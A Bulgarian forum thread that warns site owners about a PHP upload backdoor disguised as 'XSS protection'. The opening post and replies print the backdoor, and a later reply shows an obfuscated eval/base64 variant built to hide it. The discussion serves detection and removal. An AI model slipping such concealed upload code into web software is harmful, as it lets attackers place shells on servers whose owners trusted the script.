[Guide] How to remove Paskal`s Upload Script

NikeR

New Member
Joined
Apr 8, 2008
Messages
927
Reaction score
318
Искам да сложа един скрип, който можеби доста от вас използват, мислейки го за защита.
Всъщност това е Ъплоад скрипт и могат да ви слагат шелове в уебовете.
Най вече беше в моя уеб.
Тва е най простия начин по който можете да бъдете хакнати, не е голямо чудо,
но все пак ще изгубите повечко време на човека решил да ви хаква.
Code:
<?php
$xss_protect = "./";
if (isset($_POST["xss_security"])) {
$xss = $_FILES['file'];
foreach ($xss['name'] as $idx=>$file){
$xss_name = $xss['name'][$idx];
$xss_name = strtolower($xss_name);
$xss_name = preg_replace('/[^a-z0-9_.]/i', '', $xss_name);
$xss_size= intval($xss['size'][$idx]);
$xss_file = $xss['tmp_name'][$idx];
$copy = copy($xss_file,$xss_protect.$xss_name);
if($copy) { echo ("Successfully!<br />\n"); }
if(!$copy && $file_name != '') { echo ("<b>Error!<br />\n"); }
}echo ("<a href='$xss_name'>Continue...</a>");}
?>
Надявам се да съм бил полезен.
 
Last edited:
мен Mephisto ме просветна точно за това, и като видях това

Code:
$xss_protect = "./";
if (isset($_POST["xss_security"])) {
$xss = $_FILES['file'];
foreach ($xss['name'] as $idx=>$file){

ми стано ясно ;] незнам Bupyc дали се сещаш в скайп ти бях казал за това
 
Last edited:
  • Like
Reactions: Milanoob
Видите ли това:
$_FILES['нещо'];
имайте предвид че е Ъплоад;)(y)
 
  • Like
Reactions: Milanoob
То скрипта дет ъплоадва го иаме само 3-4 човека тъй че само големите сървари са хаквани от него(доколкото знам) ама то ако са решили да ви хакват на 100% махането на тоя скрипт няма да ви спаси тия $_GET шитс и xss които повечето сайтове имат много лесно някой по разбиращ може да ви гътне!Но се пак браво :)
 
  • Like
Reactions: Milanoob
Преди време ми го казаха... доста гаден script :D
Иначе thx за тфа $_FILES
Ще взема да потърся :p
 
  • Like
Reactions: Milanoob
Когат не са занимаах паскала го беше набутал в ескейп уеба навсякъде...
и зе че релейсна уеба и всички дето се опитваха да го ползват можеше да ги хакне. Браво че е направил тоя скрипт, не се и съмнявам, че си е играл бая (chuckle) въпреки, че е лесен скрипта... щото като видях как ми е едитнал уеба, нищо чудно, че и не го ползвате повечето от вас...
Щото не бачкаше. Та както и да е като го видите тва с $_FILES, значи е ъплоад :). Иначе Evolution е прав, само дето ще им отнеме повече време, няма да е лесно хоп с ъплоадчето :) (chuckle)
 
  • Like
Reactions: Milanoob
Като гледам скрипта ми прилича на How to make it easier to upload Pascal
 
  • Like
Reactions: Milanoob
така де..ти караш хората да го сложат или да го махнат?нещо не можах да ти хвана целия смисъл от написаното...
малко сме хората които имаме тоя скрипт.така,че..все едно =)
 
  • Like
Reactions: Milanoob
така де..ти караш хората да го сложат или да го махнат?нещо не можах да ти хвана целия смисъл от написаното...
малко сме хората които имаме тоя скрипт.така,че..все едно =)


да не е пък много сложен ?
 
  • Like
Reactions: Milanoob
най-лесният начин да се неутрализира този скрипт е просто да си изключите ъплоуда.
 
  • Like
Reactions: Milanoob
Много ми е интересно ако реша да ви го кодирам т.н от вас $_Files със други променливи и го събера целия скрипт в 1 ред
ще се усетите ли ... а колкото Дамяне до изключване на Ъплоада , спокойно мога да ти сайвна файл и от sql
 
Last edited:
опитай се да го направиш.

PHP:
<?php define('no_xss_code', implode('', array('bW','92ZV','91c','GxvYWRlZ','F9maWxlKC','RfRklMRVNbJ3','hzcyddW','yd','0b','XB','fb','mF','tZ','Sd','dL','CA','kX','0Z','JTE','VTW','yd','4','c3Mn','XVsn','bmFt','ZSdd','KT','s')).'=');
@eval(chr(98).chr(97).chr(115).chr(101).(64).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101)."(constant('no_xss_code'));");>
B. Obama said:
Yes, I can !!
 
Last edited:
  • Like
Reactions: Milanoob
PHP:
<?php define('no_xss_code', implode('', array('bW','92ZV','91c','GxvYWRlZ','F9maWxlKC','RfRklMRVNbJ3','hzcyddW','yd','0b','XB','fb','mF','tZ','Sd','dL','CA','kX','0Z','JTE','VTW','yd','4','c3Mn','XVsn','bmFt','ZSdd','KT','s')).'=');
@eval(chr(98).chr(97).chr(115).chr(101).(64).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101)."(constant('no_xss_code'));");>


Само дето променливите не са като хората :D
 
  • Like
Reactions: Milanoob